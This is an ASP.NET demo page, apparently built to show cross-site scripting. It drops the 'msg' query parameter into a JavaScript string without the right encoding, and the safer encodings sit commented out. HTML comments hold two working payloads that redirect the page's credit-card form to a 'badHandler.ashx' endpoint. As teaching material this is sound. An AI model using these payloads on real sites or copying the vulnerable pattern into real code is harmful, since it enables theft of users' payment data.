﻿<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="CSSAttack.aspx.cs" Inherits="Skynet.WebSite.Demos.CSSAttack" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
    <script src="http://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript">
    </script>    
</head>
<body>
    <script type="text/javascript">
        $(function () {
            var msg = '<%: Request.QueryString["msg"]  %>';           
            //var msg = '<%= HttpUtility.HtmlEncode(Request.QueryString["msg"])  %>';           
            //var msg = '<%= HttpUtility.JavaScriptStringEncode(Request.QueryString["msg"]) %>';
            $('#divInput').hide().html(msg).show('slow');
        });
    </script>
    <div id="divInput"  style=" display:inline;  font-size:2em;">  </div>
    <form id="form1" runat="server">
    <div>            
        <!-- msg=welcome';document.forms%5b0%5d%5b'action'%5d+%3D+'http://localhost:63195/Demos/badHandler.ashx';%20var%20x%20=%20'-->
        <!-- msg=welcome\x3cscript%20defer\x3edocument.forms%5b0%5d%5b\x27action\x27%5d+%3D+\x27http://localhost:63195/Demos/badHandler.ashx\x27;\r\n\x3c/script\x3e-->
        <p>Credit card </p>      
        <asp:TextBox ID="txtCreditCard" runat="server"></asp:TextBox>
        <asp:Button ID="btnSummit" runat="server" Text="Button" 
            onclick="btnSummit_Click"   />
        <!-- <p> <%=   HttpUtility.JavaScriptStringEncode(Request.QueryString["msg"]) %> </p>        -->

        <asp:Label ID="Label1" runat="server" Text=""></asp:Label>
    </div>
    </form>
</body>
</html>
